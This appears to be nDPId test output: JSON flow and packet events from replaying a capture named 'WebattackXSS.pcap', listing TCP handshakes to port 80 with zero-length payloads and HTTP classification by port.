+00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347039587,"flow_last_seen":1499347044619,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52978,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347039587,"flow_last_seen":1499347044619,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":52978,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347042150,"flow_last_seen":1499347047620,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53004,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347042150,"flow_last_seen":1499347047620,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53004,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347043416,"flow_last_seen":1499347048620,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53018,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347043416,"flow_last_seen":1499347048620,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53018,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347044676,"flow_last_seen":1499347050622,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53032,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347044676,"flow_last_seen":1499347050622,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347170842,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53032,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1708,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347172098,"flow_last_seen":1499347172098,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347172098,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54362,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1708,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1499347172098,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347172098,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8dk5AAD4GT4KsEAABwKgKMtRaAFDNItnFAAAAAKACchAyrAAAAgQFtAQCCAoBOa+LAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1709,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":2,"flow_last_seen":1499347172098,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347172098,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1FoQ75vBzSLZxqAScSAB9QAAAgQFtAQCCAoD44ECATmviwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1710,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":3,"flow_last_seen":1499347172099,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347172099,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0dk9AAD4GT4msEAABwKgKMtRaAFDNItnGEO+bwoAQAOWg\/AAAAQEICgE5r4sD44EC"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1717,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347173373,"flow_last_seen":1499347173373,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347173373,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54376,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1717,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1499347173373,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347173373,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XK1AAD4GaSOsEAABwKgKMtRoAFDpcOxnAAAAAKACchACbwAAAgQFtAQCCAoBObDKAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":2,"flow_last_seen":1499347173373,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347173373,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1GhwCsiK6XDsaKAScSBElAAAAgQFtAQCCAoD44JBATmwygEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":3,"flow_last_seen":1499347173374,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347173374,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XK5AAD4GaSqsEAABwKgKMtRoAFDpcOxocArIi4AQAOXjmwAAAQEICgE5sMoD44JB"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347174667,"flow_last_seen":1499347174667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347174667,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54390,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1499347174667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347174667,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LxxAAD4GlrSsEAABwKgKMtR2AFATHZ0RAAAAAKACchAmyAAAAgQFtAQCCAoBObINAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1733,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":2,"flow_last_seen":1499347174667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347174667,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1HZkheFBEx2dEqAScSBaeAAAAgQFtAQCCAoD44OEATmyDQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1734,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":3,"flow_last_seen":1499347174668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347174668,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Lx1AAD4GlrusEAABwKgKMtR2AFATHZ0SZIXhQoAQAOX5fgAAAQEICgE5sg4D44OE"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1747,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347177248,"flow_last_seen":1499347177248,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347177248,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54416,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1747,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1499347177248,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347177248,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XzZAAD4GZpqsEAABwKgKMtSQAFC5seulAAAAAKACchAu\/wAAAgQFtAQCCAoBObSTAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1748,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":2,"flow_last_seen":1499347177248,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347177248,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1JDtsXHRubHrpqAScSBGbgAAAgQFtAQCCAoD44YJATm0kwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1749,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":3,"flow_last_seen":1499347177249,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347177249,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XzdAAD4GZqGsEAABwKgKMtSQAFC5seum7bFx0oAQAOXldQAAAQEICgE5tJMD44YJ"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1759,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347178540,"flow_last_seen":1499347178540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347178540,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54430,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1759,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1499347178540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347178540,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8rRdAAD4GGLmsEAABwKgKMtSeAFA54BjBAAAAAKACchCAZAAAAgQFtAQCCAoBObXWAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1760,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":2,"flow_last_seen":1499347178540,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347178540,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1J7RuWV+OeAYwqAScSC+2wAAAgQFtAQCCAoD44dMATm11gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1761,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":3,"flow_last_seen":1499347178541,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347178541,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0rRhAAD4GGMCsEAABwKgKMtSeAFA54BjC0bllf4AQAOVd4wAAAQEICgE5tdYD44dM"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1780,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347181178,"flow_last_seen":1499347181178,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181178,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54456,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1780,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1499347181178,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347181178,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iI9AAD4GPUGsEAABwKgKMtS4AFBWujDmAAAAAKACchBIuAAAAgQFtAQCCAoBObhpAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1781,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":2,"flow_last_seen":1499347181178,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347181178,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1LiEJRdhVrow56AScSAgTQAAAgQFtAQCCAoD44ngATm4aQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1782,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":3,"flow_last_seen":1499347181179,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347181179,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iJBAAD4GPUisEAABwKgKMtS4AFBWujDnhCUXYoAQAOW\/UwAAAQEICgE5uGoD44ng"} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347047249,"flow_last_seen":1499347052623,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53058,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347047249,"flow_last_seen":1499347052623,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53058,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347048548,"flow_last_seen":1499347053624,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53072,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347048548,"flow_last_seen":1499347053624,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53072,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347051144,"flow_last_seen":1499347056624,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53098,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347051144,"flow_last_seen":1499347056624,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53098,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347052434,"flow_last_seen":1499347057625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53112,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347052434,"flow_last_seen":1499347057625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53112,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347053735,"flow_last_seen":1499347059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53126,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1786,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347053735,"flow_last_seen":1499347059625,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347181185,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53126,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1789,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347182435,"flow_last_seen":1499347182435,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347182435,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54470,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1789,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1499347182435,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347182435,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83IhAAD4G6UesEAABwKgKMtTGAFDgpGUsAAAAAKACchCJPgAAAgQFtAQCCAoBObmkAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1790,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":2,"flow_last_seen":1499347182435,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347182435,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1MbnFi1c4KRlLaAScSDmrAAAAgQFtAQCCAoD44saATm5pAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1791,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":3,"flow_last_seen":1499347182436,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347182436,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03IlAAD4G6U6sEAABwKgKMtTGAFDgpGUt5xYtXYAQAOWFtAAAAQEICgE5uaQD44sa"} 